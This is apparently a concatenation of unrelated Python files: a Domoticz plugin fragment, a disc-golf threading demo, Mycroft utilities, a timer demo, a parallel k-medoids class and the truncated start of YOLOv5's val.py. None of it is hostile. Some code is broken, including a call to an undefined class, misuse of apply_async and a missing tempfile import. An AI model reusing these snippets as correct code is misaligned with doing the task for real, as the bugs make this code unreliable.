if Parameters[x] != "":
Domoticz.Debug( "'" + x + "':'" + str(Parameters[x]) + "'")
Domoticz.Debug("Device count: " + str(len(Devices)))
for x in Devices:
Domoticz.Debug("Device: " + str(x) + " - " + str(Devices[x]))
Domoticz.Debug("Device ID: '" + str(Devices[x].ID) + "'")
Domoticz.Debug("Device Name: '" + Devices[x].Name + "'")
Domoticz.Debug("Device nValue: " + str(Devices[x].nValue))
Domoticz.Debug("Device sValue: '" + Devices[x].sValue + "'")
Domoticz.Debug("Device LastLevel: " + str(Devices[x].LastLevel))
return
# Loop thru domoticz devices and see if there's a device with matching DeviceID, if so, return unit number, otherwise return zero
def getUnit(devid):
unit = 0
for x in Devices:
if Devices[x].DeviceID == devid:
unit = x
break
return unit
# Find the smallest unit number available to add a device in domoticz
def nextUnit():
unit = 1
while unit in Devices and unit < 255:
unit = unit + 1
return unit
def UpdateDevice(Unit, nValue, sValue, TimedOut):
# Make sure that the Domoticz device still exists (they can be deleted) before updating it
if (Unit in Devices):
#if (Devices[Unit].nValue != nValue) or (Devices[Unit].sValue != sValue) or (Devices[Unit].TimedOut != TimedOut):
Devices[Unit].Update(nValue=nValue, sValue=str(sValue), TimedOut=TimedOut)
Domoticz.Log("Update "+str(nValue)+":'"+str(sValue)+"' ("+Devices[Unit].Name+") TimedOut="+str(TimedOut))
return
|
1_disc_golf_range.py | import threading
from threading import Thread, Semaphore, Lock
import random
from time import sleep
#configurable variables
STASH = 25
BUCKET_SIZE = 5
NUM_FROLFERS = 5
#Locking Structures
stashLock = Lock()
fieldLock = Lock()
stashEmpty = Semaphore(0)
stashFull = Semaphore(0)
#other global vars
discs_on_field = 0
rng = random.Random()
rng.seed(50)
#aux functions
def delimiter():
print("#################################################################")
def frolfer(thread_id):
global STASH, BUCKET_SIZE, NUM_FROLFERS
global discs_on_field
global rng
global stashLock, fieldLock, stashEmpty, stashFull
bucket = 0
while True:
while bucket == 0:
stashLock.acquire()
print ("Frolfer", thread_id, "calling for a bucket")
if STASH < BUCKET_SIZE:
stashEmpty.release() # stash is empty. Signal cart
stashFull.acquire() # wait for stash to be full
if STASH < BUCKET_SIZE: # if cart STILL didn't bring enough discs
stashLock.release()
continue # go back to top of while bucket == 0 loop
if STASH >= BUCKET_SIZE:
STASH -= BUCKET_SIZE # acquire a bucket
bucket += BUCKET_SIZE
print ("Frolfer", thread_id, "got", bucket, "discs; Stash =", STASH)
stashLock.release()
for i in range(0, bucket):
fieldLock.acquire()
discs_on_field += 1
print ("Frolfer", thread_id, "threw disc", i)
fieldLock.release()
sleep(rng.random() * 5)
bucket = 0
def cart():
global STASH, BUCKET_SIZE, NUM_FROLFERS
global discs_on_field
global rng
global stashLock, fieldLock, stashEmpty, stashFull
while True:
stashEmpty.acquire() # block until stash is empty
fieldLock.acquire()
sleep(rng.random() * 2)
delimiter()
initial_stash = STASH
discs_collected = discs_on_field
print("Stash =", initial_stash,"; Cart entering field")
STASH += discs_on_field
discs_on_field = 0
print("Cart done, gathered", discs_collected, "dics; Stash = ", STASH)
delimiter()
fieldLock.release()
stashFull.release() # signal frolfers that are waiting on the stash to release
sleep(rng.random() * 5)
def main():
cart_t = Thread(target = cart)
cart_t.start()
for i in range(NUM_FROLFERS):
frolfer_t = Thread(target=frolfer, args=[i])
frolfer_t.start()
main()
|
__init__.py | # Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import socket
import subprocess
from os.path import join, expanduser
from threading import Thread
from time import sleep
import json
import os.path
import psutil
from stat import S_ISREG, ST_MTIME, ST_MODE, ST_SIZE
import requests
import signal as sig
import mycroft.audio
import mycroft.configuration
from mycroft.util.format import nice_number
# Officially exported methods from this file:
# play_wav, play_mp3, get_cache_directory,
# resolve_resource_file, wait_while_speaking
from mycroft.util.log import LOG
from mycroft.util.parse import extract_datetime, extractnumber, normalize
from mycroft.util.signal import *
def resolve_resource_file(res_name):
"""Convert a resource into an absolute filename.
Resource names are in the form: 'filename.ext'
or 'path/filename.ext'
The system wil look for ~/.mycroft/res_name first, and
if not found will look at /opt/mycroft/res_name,
then finally it will look for res_name in the 'mycroft/res'
folder of the source code package.
Example:
With mycroft running as the user 'bob', if you called
resolve_resource_file('snd/beep.wav')
it would return either '/home/bob/.mycroft/snd/beep.wav' or
'/opt/mycroft/snd/beep.wav' or '.../mycroft/res/snd/beep.wav',
where the '...' is replaced by the path where the package has
been installed.
Args:
res_name (str): a resource path/name
"""
config = mycroft.configuration.Configuration.get()
# First look for fully qualified file (e.g. a user setting)
if os.path.isfile(res_name):
return res_name
# Now look for ~/.mycroft/res_name (in user folder)
filename = os.path.expanduser("~/.mycroft/" + res_name)
if os.path.isfile(filename):
return filename
# Next look for /opt/mycroft/res/res_name
data_dir = expanduser(config['data_dir'])
filename = os.path.expanduser(join(data_dir, res_name))
if os.path.isfile(filename):
return filename
# Finally look for it in the source package
filename = os.path.join(os.path.dirname(__file__), '..', 'res', res_name)
filename = os.path.abspath(os.path.normpath(filename))
if os.path.isfile(filename):
return filename
return None # Resource cannot be resolved
def play_wav(uri):
config = mycroft.configuration.Configuration.get()
play_cmd = config.get("play_wav_cmdline")
play_wav_cmd = str(play_cmd).split(" ")
for index, cmd in enumerate(play_wav_cmd):
if cmd == "%1":
play_wav_cmd[index] = (get_http(uri))
return subprocess.Popen(play_wav_cmd)
def play_mp3(uri):
config = mycroft.configuration.Configuration.get()
play_cmd = config.get("play_mp3_cmdline")
play_mp3_cmd = str(play_cmd).split(" ")
for index, cmd in enumerate(play_mp3_cmd):
if cmd == "%1":
play_mp3_cmd[index] = (get_http(uri))
return subprocess.Popen(play_mp3_cmd)
def record(file_path, duration, rate, channels):
if duration > 0:
return subprocess.Popen(
["arecord", "-r", str(rate), "-c", str(channels), "-d",
str(duration), file_path])
else:
return subprocess.Popen(
["arecord", "-r", str(rate), "-c", str(channels), file_path])
def get_http(uri):
return uri.replace("https://", "http://")
def remove_last_slash(url):
if url and url.endswith('/'):
url = url[:-1]
return url
def read_stripped_lines(filename):
with open(filename, 'r') as f:
return [line.strip() for line in f]
def read_dict(filename, div='='):
d = {}
with open(filename, 'r') as f:
for line in f:
(key, val) = line.split(div)
d[key.strip()] = val.strip()
return d
def connected():
""" Check connection by connecting to 8.8.8.8, if this is
blocked/fails, Microsoft NCSI is used as a backup
Returns:
True if internet connection can be detected
"""
return connected_dns() or connected_ncsi()
def connected_ncsi():
""" Check internet connection by retrieving the Microsoft NCSI endpoint.
Returns:
True if internet connection can be detected
"""
try:
r = requests.get('http://www.msftncsi.com/ncsi.txt')
if r.text == u'Microsoft NCSI':
return True
except Exception:
pass
return False
def connected_dns(host="8.8.8.8", port=53, timeout=3):
""" Check internet connection by connecting to DNS servers
Returns:
True if internet connection can be detected
"""
# Thanks to 7h3rAm on
# Host: 8.8.8.8 (google-public-dns-a.google.com)
# OpenPort: 53/tcp
# Service: domain (DNS/TCP)
try:
socket.setdefaulttimeout(timeout)
socket.socket(socket.AF_INET, socket.SOCK_STREAM).connect((host, port))
return True
except IOError:
try:
socket.socket(socket.AF_INET, socket.SOCK_STREAM).connect(
("8.8.4.4", port))
return True
except IOError:
return False
def curate_cache(directory, min_free_percent=5.0, min_free_disk=50):
"""Clear out the directory if needed
This assumes all the files in the directory can be deleted as freely
Args:
directory (str): directory path that holds cached files
min_free_percent (float): percentage (0.0-100.0) of drive to keep free,
default is 5% if not specified.
min_free_disk (float): minimum allowed disk space in MB, default
value is 50 MB if not specified.
"""
# Simpleminded implementation -- keep a certain percentage of the
# disk available.
# TODO: Would be easy to add more options, like whitelisted files, etc.
space = psutil.disk_usage(directory)
# convert from MB to bytes
min_free_disk *= 1024 * 1024
# space.percent = space.used/space.total*100.0
percent_free = 100.0 - space.percent
if percent_free < min_free_percent and space.free < min_free_disk:
LOG.info('Low diskspace detected, cleaning cache')
# calculate how many bytes we need to delete
bytes_needed = (min_free_percent - percent_free) / 100.0 * space.total
bytes_needed = int(bytes_needed + 1.0)
# get all entries in the directory w/ stats
entries = (os.path.join(directory, fn) for fn in os.listdir(directory))
entries = ((os.stat(path), path) for path in entries)
# leave only regular files, insert modification date
entries = ((stat[ST_MTIME], stat[ST_SIZE], path)
for stat, path in entries if S_ISREG(stat[ST_MODE]))
# delete files with oldest modification date until space is freed
space_freed = 0
for moddate, fsize, path in sorted(entries):
try:
os.remove(path)
space_freed += fsize
except:
pass
if space_freed > bytes_needed:
return # deleted enough!
def get_cache_directory(domain=None):
"""Get a directory for caching data
This directory can be used to hold temporary caches of data to
speed up performance. This directory will likely be part of a
small RAM disk and may be cleared at any time. So code that
uses these cached files must be able to fallback and regenerate
the file.
Args:
domain (str): The cache domain. Basically just a subdirectory.
Return:
str: a path to the directory where you can cache data
"""
config = mycroft.configuration.Configuration.get()
dir = config.get("cache_path")
if not dir:
# If not defined, use /tmp/mycroft/cache
dir = os.path.join(tempfile.gettempdir(), "mycroft", "cache")
return ensure_directory_exists(dir, domain)
def validate_param(value, name):
if not value:
raise ValueError("Missing or empty %s in mycroft.conf " % name)
def is_speaking():
"""Determine if Text to Speech is occurring
Returns:
bool: True while still speaking
"""
LOG.info("mycroft.utils.is_speaking() is depreciated, use "
"mycroft.audio.is_speaking() instead.")
return mycroft.audio.is_speaking()
def wait_while_speaking():
"""Pause as long as Text to Speech is still happening
Pause while Text to Speech is still happening. This always pauses
briefly to ensure that any preceeding request to speak has time to
begin.
"""
LOG.info("mycroft.utils.wait_while_speaking() is depreciated, use "
"mycroft.audio.wait_while_speaking() instead.")
return mycroft.audio.wait_while_speaking()
def stop_speaking():
# TODO: Less hacky approach to this once Audio Manager is implemented
# Skills should only be able to stop speech they've initiated
LOG.info("mycroft.utils.stop_speaking() is depreciated, use "
"mycroft.audio.stop_speaking() instead.")
mycroft.audio.stop_speaking()
def get_arch():
""" Get architecture string of system. """
return os.uname()[4]
def reset_sigint_handler():
"""
Reset the sigint handler to the default. This fixes KeyboardInterrupt
not getting raised when started via start-mycroft.sh
"""
sig.signal(sig.SIGINT, sig.default_int_handler)
def create_daemon(target, args=(), kwargs=None):
"""Helper to quickly create and start a thread with daemon = True"""
t = Thread(target=target, args=args, kwargs=kwargs)
t.daemon = True
t.start()
return t
def wait_for_exit_signal():
"""Blocks until KeyboardInterrupt is received"""
try:
while True:
sleep(100)
except KeyboardInterrupt:
pass
def create_echo_function(name, whitelist=None):
from mycroft.configuration import Configuration
blacklist = Configuration.get().get("ignore_logs")
def echo(message):
"""Listen for messages and echo them for logging"""
try:
js_msg = json.loads(message)
if whitelist and js_msg.get("type") not in whitelist:
return
if blacklist and js_msg.get("type") in blacklist:
return
if js_msg.get("type") == "registration":
# do not log tokens from registration messages
js_msg["data"]["token"] = None
message = json.dumps(js_msg)
except Exception:
pass
LOG(name).debug(message)
return echo
|
timer.py | import threading
import time
tLock = threading.Lock()
def timer(name, delay, repeat):
print "Timer" + name + ": Started."
tLock.acquire()
print "Timer" + name + ": has acquire the lock."
while repeat > 0:
time.sleep(delay)
print "Timer" + name + ": " + str(time.ctime(time.time()))
repeat -= 1
print "Timer" + name + ": is releasing the lock."
tLock.release()
print "Timer" + name + ": Completed."
def Main():
t1 = threading.Thread(target = timer, args = ("1", 1, 3))
t2 = threading.Thread(target = timer, args = ("2", 2, 3))
t1.start()
t2.start()
print "Main Completed."
if __name__ == '__main__':
Main()
|
kMedoids_parallel.py | # new code in this file from kMedoidsClustering.py Written by Matteo Bjornsson
#################################################################### MODULE COMMENTS ############################################################################
# This file is a mirror of kMedoidsClustering.py but with much of the distortion code parallelized
##################################################################### MODULE COMMENTS ############################################################################
import copy, random
import multiprocessing
import kNN, DataUtility, kMedoidsClustering
import numpy as np
class kMedoids_parallel:
#on the creation of a given object run the following
def __init__(self,
# number of neighbors in knn
kNeighbors: int,
# number of clusters
kValue: int,
# data to cluster
dataSet: np.ndarray,
# 'mixed', 'categorical', or 'real' data set
data_type: str,
# list of integers representing categorical feature column indices
categorical_features: list,
# True if the data set is a regression data set
regression_data_set: bool,
# weight for real value in distance metric
alpha: int,
# weight for categorical value in distance metric
beta: int,
# bin width for gaussian kernel smoother
h: float,
# dimensionality of data set (# features)
d: int,
# pass in the test data set at init
Testdata: np.ndarray):
# create a Nearest Neighbor object to single nearest neighbor to input data point
self.nn = kNN.kNN(1, data_type, categorical_features, regression_data_set, alpha, beta, h, d)
self.knn = kNN.kNN(kNeighbors, data_type, categorical_features, regression_data_set, alpha, beta, h, d)
self.categorical_features = categorical_features
# save which features are real as well by deleting categorical indices from a new list
real_features = list(range(d))
for i in categorical_features:
real_features.remove(i)
self.real_features = real_features
self.kValue = kValue
self.dataSet = dataSet
# dimensionality of data set
self.d = d
self.itermax = 10
self.Testdata = Testdata
self.initial_medoids = self.choose_random_medoids()
self.assignments = []
#Parameters: N/a
#Returns: Return the numpy array of medoids
#Function: Generate a random list of medoids
def choose_random_medoids(self):
#Create a new empty array
indices = []
#Loop through the number of neighbros we are looking at
for k in range(self.kValue):
#SEt te index to be a random value within the dataset
index = random.randint(0, len(self.dataSet)-1)
#make sure the inde is unique by generating a new value if the inde already exists
while index in indices:
#Set the index to a random value in the data set
index = random.randint(0, len(self.dataSet)-1)
#Append the index to the arary
indices.append(index)
#Create an empty list
medoids = []
#For each of the indices
for i in indices:
medoids.append(self.dataSet[i].reshape(1, self.dataSet.shape[1]))
#Reprtun the numpy array of medoids
return np.concatenate(medoids)
#Parameters: Take in a list of points and the list of medoids
#Returns: Return the nearest medoid
#Function: find the nearest medoid to given sample, return the medoid index
def closest_medoid_to_point(self, point: list, medoids: np.ndarray) -> list:
# use the knn get_neighor class method to find the closest medoid
medoid = self.nn.get_k_neighbors(medoids, point, k=1)
# return the medoid index, element 1 of [distance, index, response var]
return medoid[0][1]
#Parameters: Take in the list of medoids and all of the data points
#Returns: Return the medoid assignment for each data point taken in
#Function: assign each data point in data set to the nearest medoid. This is stored in an array as an integer representing the medoid index at the index of the point belonging to it.
def assign_all_points_to_closest_medoid(self, medoids: np.ndarray, data: np.ndarray) -> list:
medoid_assignments = [None] * len(data)
# for each data point
for i in range(len(data)):
x = data[i].tolist()[:-1]
# store the index of the medoid at the index corresponding to the sample position
medoid_assignments[i] = self.closest_medoid_to_point(x, medoids)
# return the list of indices
return medoid_assignments
#Parameters: Take in the medoids, the medoid assignments and the data array
#Returns: Returns the distorion value
#Function: Generate and return the distortion value based on the given points in the medoids
def distortion(self, medoids: np.ndarray, medoid_assignments: list, data: np.ndarray) -> list:
#Set the distortion value to 0
distortion = [0] * len(medoids)
#Loop through the number of indices in the medoids array
for i in range(len(medoids)):
#Store the current medoid we are looking at
m = medoids[i].tolist()[:-1]
points_in_cluster = []
# for the current medoid, look up all examples x that are assigned
# to that medoid (have a value at their index position in the medoid
# assignment list that matches the current medoid)
for n in range(len(medoid_assignments)):
#store the medoid that point x is assigned to
x_assignment = medoid_assignments[n]
# if x is assigned to medoid i (current medoid), append the actual data point to a list
if x_assignment == i:
# get the point and reshape it into a np array that can be concatenated together
points_in_cluster.append(data[n].reshape(1, data.shape[1]))
if len(points_in_cluster) > 0:
points_in_cluster = np.concatenate(points_in_cluster)
# use the knn method "get_k_neighbors" to calculate the distance from current medoid m to all points in the cluster
point_distances = self.nn.get_k_neighbors(points_in_cluster, m, len(points_in_cluster))
#For each of the points above
for point in point_distances:
distance_from_m = point[0]
#Add the distortion value to the variable for each of the points
distortion[i] += (distance_from_m)**2
#Return the distortion
return distortion
# calculate distortion piecewise. Each component of distortion is unique to the medoid
# and can be calculated with only that medoid and the data set
def distortion_parallel(self, medoids, medoid_assignments):
#start some multiprocessing tools
manager = multiprocessing.Manager()
q = manager.Queue()
pool = multiprocessing.Pool()
# for every medoid, calculate the distortion of that medoid
for i in range(len(medoids)):
pool.apply_async(
self.per_medoid_distortion(i, medoids[i], medoid_assignments, q)
# callback=log_results
)
pool.close()
pool.join()
# store all the calculations and return
distortion = [0] * len(medoids)
while not q.empty():
medoid_index, new_distortion = q.get()
# medoid_index, new_distortion = res.get()
distortion[medoid_index] = new_distortion
return distortion
#Parameters: Take in the medoids, the medoid assignments and the data
#Returns: return the list of updated medoid values
#Function: Update all of th emedoid feature values
def update_medoids_parallel(self, medoids: np.ndarray, medoid_assignments: list, data: np.ndarray) -> np.ndarray:
# calculate the initial distortion in parallel
initial_distortion = self.distortion_parallel(medoids, medoid_assignments)
# start some multiprocessing tools
manager = multiprocessing.Manager()
q = manager.Queue()
# accumulator listens for new distortion values generated by workers
# and keeps them if they are smaller than the current value
accumulator = multiprocessing.Process(target=self.update_processor, args=(q, medoids, initial_distortion))
accumulator.start()
pool = multiprocessing.Pool()
results = []
# for every medoid and for every data point, calculate that points distortion
for j in range(len(medoids)):
for i in range(len(data)):
results.append(pool.apply_async(self.queue_new_medoid_i_distortion, args=(q, j, i, initial_distortion[j], medoid_assignments)))
print()
pool.close()
pool.join()
q.put('kill')
# get the final product from the queue, placed by the accumulator
updated_medoids = q.get()
# print("updated medoids", updated_medoids)
accumulator.join()
for r in results:
r = r.get()
print("Medoids updated")
return updated_medoids
# multiprocessing worker function:
# for a given point, calculate it's distortion and queue it track which medoid we are considering to replace
def queue_new_medoid_i_distortion(self, q, medoid_index, data_index, initial_distortion_i, medoid_assignments):
# calculate the distortion of the new data point
medoid_index, new_distortion_i = self.per_medoid_distortion(medoid_index, self.dataSet[data_index], medoid_assignments)
# if the distortion is smaller than the distortion of the medoid it is proposed to be replacing, queue the value
if new_distortion_i < initial_distortion_i:
# place the smaller distortion on the queue
q.put([medoid_index, new_distortion_i, data_index])
# function for calculating the distortion of a given point/medoid
def per_medoid_distortion(self, medoid_index, medoid, medoid_assignments, q=None):
medoid_position = medoid.tolist()[:-1]
distortion_i = 0
# collect all data points that belong to the cluster identified by the medoid index
cluster_members = []
for j in range(len(medoid_assignments)):
assignment = medoid_assignments[j]
if assignment == medoid_index:
cluster_members.append(self.dataSet[j].reshape(1, self.dataSet.shape[1]))
# check if there are any members
if len(cluster_members) > 0:
# calcluate the distances from the medoid to all the cluster members using
# the already written knn function get_k_neighbors
cluster_members = np.concatenate(cluster_members)
cluster_point_distances = self.nn.get_k_neighbors(cluster_members, medoid_position, len(cluster_members))
# for each point in the cluster, get its distance and add it's
# squared value to the distortion aggregator
for cluster_point in cluster_point_distances:
distance_to_proposed_medoid = cluster_point[0]
distortion_i += (distance_to_proposed_medoid)**2
# for flexibility, if a queue is given, queue the distortion, otherwise return it
if q is None:
return[medoid_index, distortion_i]
else:
q.put([medoid_index, distortion_i])
# target function for aggregating parallel computations
# collect all computations and save them when they are smaller than the current distortion
def update_processor(self, q, current_medoids, initial_distortion):
medoids = copy.deepcopy(current_medoids)
count = 0
# listen for new computations
while True:
# get the next computation
distortion_element = q.get()
# if it is a flag to stop working, return the result and break
if distortion_element == 'kill':
q.put(medoids)
break
# for the given medoid index, check if the new distortion value is smaller
medoid_index, new_distortion_i, new_x_index = distortion_element
initial_distortion_i = initial_distortion[medoid_index]
# if it is, replace it with the ne value
if new_distortion_i < initial_distortion_i:
initial_distortion[medoid_index] = new_distortion_i
medoids[medoid_index] = self.dataSet[new_x_index]
#Parameters: N/a
#Returns: Return the list of updated medoid values
#Function: Generate and update the feature mean values for each medoids
def generate_cluster_medoids(self):
#Store off the first assignment value
first_assignment = self.assign_all_points_to_closest_medoid(self.initial_medoids, self.dataSet)
#Store the update medoids value based on the first assignment
updated_medoids = self.update_medoids_parallel(self.initial_medoids, first_assignment, self.dataSet)
#Set a count to be 0
count = 0
# print("count: ", count)
while True:
#Set a second assignment and store the value
second_assignment = self.assign_all_points_to_closest_medoid(updated_medoids, self.dataSet)
# code for indicating if the medoid assignments are changing
count += 1
#Create an empty array
changing_assignments = []
#For each of the values until the first assignment
for i in range(len(first_assignment)):
#If the first assignment is not equal to the second assignment value
if first_assignment[i] != second_assignment[i]:
#Store thevalue off
changing_assignments.append(i)
print("medoid assignments that are changing", changing_assignments)
#If the first is equal to the second or we are beyond the iteration limit set
if first_assignment == second_assignment or count > self.itermax:
#Break
break
#Store the updated medoids from the second assignment values calculated above
updated_medoids = self.update_medoids_parallel(updated_medoids, second_assignment, self.dataSet)
#Increment count
#SEt the first assignment equal to the second assignment
first_assignment = second_assignment
#Return the updated medoids
return updated_medoids
#Parameters: N/a
#Returns: Return the classification list
#Function: Return the classifcation of the test data based on the medoids
def classify(self):
#Store the generated random medoids
medoids = self.generate_cluster_medoids()
return self.knn.classify(medoids, self.Testdata)
####################################### UNIT TESTING #################################################
if __name__ == '__main__':
print("program Start")
categorical_attribute_indices = {
"segmentation": [],
"vote": [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15],
"glass": [],
"fire": [0,1,2,3],
"machine": [0,1],
"abalone": [0]
}
regression_data_set = {
"segmentation": False,
"vote": False,
"glass": False,
"fire": True,
"machine": True,
"abalone": True
}
feature_data_types = {
"segmentation": 'real',
"vote": 'categorical',
"glass": 'real',
"fire": 'mixed',
"machine": 'mixed',
"abalone": 'mixed'
}
data_sets = [ "segmentation", "vote", "glass", "fire", "machine", "abalone"]
tuned_k = {
"segmentation": 2,
"vote": 5,
"glass": 2,
"fire": 2,
"machine": 5,
"abalone": 12
}
tuned_bin_value = {
"segmentation": .25,
"vote": .25,
"glass": .25,
"fire": .1,
"machine": .25,
"abalone": .1
}
tuned_delta_value = {
"segmentation": .25,
"vote": .25,
"glass": .25,
"fire": .5,
"machine": .1,
"abalone": .5
}
tuned_error_value = {
"fire": 1,
"abalone": 1,
"machine":2
}
tuned_cluster_number = {
"segmentation": 80,
"vote": 15,
"glass": 60,
# not sure about fire, weird behavior
"fire": 60,
"machine": 50,
"abalone": 50
}
for i in range(1):
data_set = "vote"
print("Data set: ", data_set)
du = DataUtility.DataUtility(categorical_attribute_indices, regression_data_set)
headers, full_set, tuning_data, tenFolds = du.generate_experiment_data(data_set)
test = copy.deepcopy(tenFolds[0])
training = np.concatenate(tenFolds[1:])
d = len(headers)-1
kMC_p = kMedoidsClustering_P(
kNeighbors=tuned_k[data_set],
kValue=5,
dataSet=training,
data_type=feature_data_types[data_set],
categorical_features=categorical_attribute_indices[data_set],
regression_data_set=regression_data_set[data_set],
alpha=1,
beta=1,
h=tuned_bin_value[data_set],
d=d,
Testdata=test
)
kMC = kMedoidsClustering.kMedoidsClustering(
kNeighbors=tuned_k[data_set],
kValue=5,
dataSet=training,
data_type=feature_data_types[data_set],
categorical_features=categorical_attribute_indices[data_set],
regression_data_set=regression_data_set[data_set],
alpha=1,
beta=1,
h=tuned_bin_value[data_set],
d=d,
Testdata=test
)
kMC.initial_medoids = kMC_p.initial_medoids
medoids_p = kMC_p.generate_cluster_medoids()
print(kMC_p.classify())
# print("dataset medoids: ", medoids, f"(length: {len(medoids)})")
# print("original dataset: ", kMC.dataSet, f"(length: {len(kMC.dataSet)}")
print("program end ")
####################################### UNIT TESTING #################################################
|
val.py | # YOLOv5 🚀 by Ultralytics, GPL-3.0 license
"""
Validate a trained YOLOv5 model accuracy on a custom dataset
Usage:
$ python path/to/val.py --weights yolov5s.pt --data coco128.yaml --img 640
Usage - formats:
$ python path/to/val.py --weights yolov5s.pt # PyTorch
yolov5s.torchscript # TorchScript
yolov5s.onnx # ONNX Runtime or OpenCV DNN with --dnn
yolov5s.xml # OpenVINO
yolov5s.engine # TensorRT
yolov5s.mlmodel # CoreML (MacOS-only)
yolov5s_saved_model # TensorFlow SavedModel
yolov5s.pb # TensorFlow GraphDef
yolov5s.tflite # TensorFlow Lite
yolov5s_edgetpu.tflite # TensorFlow Edge TPU
"""
import argparse
import json
import os
import sys
from pathlib import Path
from threading import Thread
import numpy as np
import torch
from tqdm import tqdm
FILE = Path(__file__).resolve()
ROOT = FILE.parents[0] # YOLOv5 root directory
if str(ROOT) not in sys.path:
sys.path.append(str(ROOT)) # add ROOT to PATH
ROOT = Path(os.path.relpath(ROOT, Path.cwd())) # relative
from models.common import DetectMultiBackend
from utils.callbacks import Callbacks
from utils.datasets import create_dataloader
from utils.general import (LOGGER, box_iou, check_dataset, check_img_size, check_requirements, check_yaml,
coco80_to_coco91_class, colorstr, increment_path, non_max_suppression, print_args,
scale_coords, xywh2xyxy, xyxy2xywh)
from utils.metrics import ConfusionMatrix, ap_per_class
from utils.plots import output_to_target, plot_images, plot_val_study
from utils.torch_utils import select_device, time_sync
def save_one_txt(predn, save_conf, shape, file):
# Save one txt result
gn = torch.tensor(shape)[[1, 0, 1, 0]] # normalization gain whwh
for *xyxy, conf, cls in predn.tolist():
xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh
line = (cls, *xywh, conf) if save_conf else (cls, *xywh) # label format
with open(file, 'a') as f:
f.write(('%g ' * len(line)).rstrip() % line + '\n')
def save_one_json(predn, jdict, path, class_map):
# Save one JSON result {"image_id": 42, "category_id": 18, "bbox": [258.15, 41.29, 348.26, 243.78], "score": 0.236}
image_id = int(path.stem) if path.stem.isnumeric() else path.stem
box = xyxy2xywh(predn[:, :4]) # xywh
box[:, :2] -= box[:, 2:] / 2 # xy center to top-left corner
for p, b in zip(predn.tolist(), box.tolist()):
jdict.append({'image_id': image_id,
'category_id': class_map[int(p[5])],
'bbox': [round(x, 3) for x in b],
'score': round(p[4], 5)})
def process_batch(detections, labels, iouv):
"""
Return correct predictions matrix. Both sets of boxes are in (x1, y1, x2, y2) format.
Arguments:
detections (Array[N, 6]), x1, y1, x2, y2, conf, class
labels (Array[M, 5]), class, x1, y1, x2, y2
Returns:
correct (Array[N, 10]), for 10 IoU levels
"""
correct = torch.zeros(detections.shape[0], iouv.shape[0], dtype=torch.bool, device=iouv.device)
iou = box_iou(labels[:, 1:], detections[:, :4])
x = torch.where((iou >= iouv[0]) & (labels[:, 0:1] == detections[:, 5])) # IoU above threshold and classes match
if x[0].shape[0]:
matches = torch.cat((torch.stack(x, 1), iou[x[0], x[1]][:, None]), 1).cpu().numpy() # [label, detection, iou]
if x[0].shape[0] > 1:
matches = matches[matches[:, 2].argsort()[::-1]]
matches = matches[np.unique(matches[:, 1], return_index=True)[1]]
# matches = matches[matches[:, 2].argsort()[::-1]]
matches = matches[np.unique(matches[:, 0], return_index=True)[1]]
matches = torch.Tensor(matches).to(iouv.device)
correct[matches[:, 1].long()] = matches[:, 2:3] >= iouv
return correct
@torch.no_grad()
def run(data,
weights=None, # model.pt path(s)
batch_size=32, # batch size
imgsz=640, # inference size (pixels)
conf_thres=0.001, # confidence threshold
iou_thres=0.6, # NMS IoU threshold
task='val', # train, val, test, speed or study
device='', # cuda device, i.e. 0 or 0,1,2,3 or cpu
workers=8, # max dataloader workers (per RANK in DDP mode)
single_cls=False, # treat as single-class dataset
augment=False, # augmented inference
verbose=False, # verbose output
save_txt=False, # save results to *.txt
save_hybrid=False, # save label+prediction hybrid results to *.txt
save_conf=False, # save confidences in --save-txt labels
save_json=False, # save a COCO-JSON results file
project=ROOT / 'runs/val', # save to project/name
name='exp', # save to project/name
exist_ok=False, # existing project/name ok, do not increment
half=True, # use FP16 half-precision inference
dnn=False, # use OpenCV DNN for ONNX inference
model=None,
dataloader=None,
save_dir=Path(''),
plots=True,
callbacks=Callbacks(),
compute_loss=None,
):
# Initialize/load model and set device
training = model is not None
if training: # called by train.py
device, pt, jit, engine = next(model.parameters()).device, True, False, False # get model device, PyTorch model
half &= device.type != 'cpu' # half precision only supported on CUDA
model.half() if half else model.float()
else: # called directly
device = select_device(device, batch_size=batch_size)
# Directories
save_dir = increment_path(Path(project) / name, exist_ok=exist_ok) # increment run
(save_dir / 'labels' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir
# Load model
model = DetectMultiBackend(weights, device=device, dnn=dnn, data=data)
stride, pt, jit, onnx, engine = model.stride, model.pt, model.jit, model.onnx, model.engine
imgsz = check_img_size(imgsz, s=stride) # check image size
half &= (pt or jit or onnx or engine) and device.type != 'cpu' # FP16 supported on limited backends with CUDA
if pt or jit:
model.model.half() if half else model.model.float()
elif engine:
batch_size = model.batch_size
if model.trt_fp16_input != half:
LOGGER.info('model ' + (
'requires' if model.trt_fp16_input else 'incompatible with') + ' --half. Adjusting automatically.')
half = model.trt_fp16_input
else:
half = False
batch_size = 1 # export.py models default to batch-size 1
device = torch.device('cpu')
LOGGER.info(f'Forcing --batch-size 1 square inference shape(1,3,{imgsz},{imgsz}) for non-PyTorch backends')
# Data
data = check_dataset(data) # check
# Configure
model.eval()
is_coco = isinstance(data.get('val'), str) and data['val'].endswith('coco/val2017.txt') # COCO dataset
nc = 1 if single_cls else int(data['nc']) # number of classes
iouv = torch.linspace(0.5, 0.95, 10).to(device) # iou vector for mAP@0.5:0.95
niou = iouv.numel()
# Dataloader
if not training:
model.warmup(imgsz=(1 if pt else batch_size, 3, imgsz, imgsz), half=half) # warmup
pad = 0.0 if task in ('speed', 'benchmark') else 0.5
rect = False if task == 'benchmark' else pt # square inference for benchmarks
task = task if task in ('train', 'val', 'test') else 'val' # path to train/val/test images
dataloader = create_dataloader(data[task], imgsz, batch_size, stride, single_cls, pad=pad, rect=rect,
workers=workers, prefix=colorstr(f'{task}: '))[0]
seen = 0
confusion_matrix = ConfusionMatrix(nc=nc)
names = {k: v for k, v in enumerate(model.names if hasattr(model, 'names') else model.module.names)}
class_map = coco80_to_coco91_class() if is_coco else list(range(1000))
